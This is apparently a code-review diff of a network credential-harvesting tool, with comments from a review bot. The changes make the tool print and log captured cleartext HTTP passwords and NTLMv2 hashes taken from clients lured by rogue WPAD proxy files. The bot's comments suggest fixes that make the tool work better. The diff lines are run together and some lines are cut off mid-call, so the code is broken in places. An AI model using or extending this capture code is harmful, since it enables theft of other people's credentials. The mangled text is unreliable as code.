ParseHTTPHash(NTLM_Auth,client) if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "WPAD (auth) file sent to: %s"%(client) + Message = "[+]WPAD (auth) file sent to: %s"%(client) if Verbose: - #print Message - logging.warning(Message) + print Message logging.warning(Message) buffer1 = WpadCustom(data,client) return buffer1 
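Review bot: In GrabURL the pattern `(?<=POST )[^HTTP]*` uses a character class, so it stops at the first `H`, `T` or `P` in the path rather than at the literal `HTTP`. The `Host3Str` line that is now printed as well as logged can therefore show a truncated URL. Something like `POST = re.findall(r'(?<=POST )\S*', data)` would capture the request target up to the next space; the GET pattern is outside the hunk and should be checked for the same construct. Separately, `print PostData` echoes the raw request body to the terminal, so submitted form passwords and any control characters in it are shown unescaped. GrabURL begins above the hunk.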
@@ -1669,13 +1670,13 @@ def PacketSequence(data,client): GrabURL(data,client) outfile = os.path.join(ResponderPATH,"HTTP-Clear-Text-Password-"+client+".txt") if PrintData(outfile,b64decode(''.join(BasicAuth))): - logging.warning("HTTP-User & Password:", b64decode(''.join(BasicAuth))) + print "[+]HTTP-User & Password:", b64decode(''.join(BasicAuth)) WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) - logging.warning('HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) + logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "WPAD (auth) file sent to: %s"%(client) + Message = "[+]WPAD (auth) file sent to: %s"%(client) if Verbose: - logging.warning(Message) + print Message logging.warning(Message) buffer1 = WpadCustom(data,client) return buffer1 @@ -1697,10 +1698,9 @@ class HTTP(BaseRequestHandler): data = self.request.recv(8092) buff = WpadCustom(data,self.client_address[0]) if buff and WpadForcedAuth(Force_WPAD_Auth) == False: - Message = "WPAD (no auth) file sent to: %s"%(self.client_address[0]) + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) if Verbose: - #print Message - logging.warning(Message) + print Message logging.warning(Message) self.request.send(buff) else: @@ -1923,48 +1923,48 @@ def ParseHTTPSHash(data,client): NthashOffset = struct.unpack(' 24: - #print "[+]HTTPS NTLMv2 hash captured from :",client - logging.warning('HTTPS NTLMv2 hash captured from :%s'%(client)) + print "[+]HTTPS NTLMv2 hash captured from :",client + logging.warning('[+]HTTPS NTLMv2 hash captured from :%s'%(client)) NthashLen = 64 DomainLen = struct.unpack('
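Review bot: The Basic-auth branch of PacketSequence evaluates `b64decode(''.join(BasicAuth))` five times on a header value supplied by the client, and the hunk shows no handling for a malformed value. Decoding once into a local, e.g. `Creds = b64decode(''.join(BasicAuth))`, and passing `Creds` to `PrintData`, `WriteData`, the `print` and the log line would be easier to read and leave one place to catch a decode error. Whether an enclosing `try` already covers this cannot be seen here, since PacketSequence starts and ends outside the hunk.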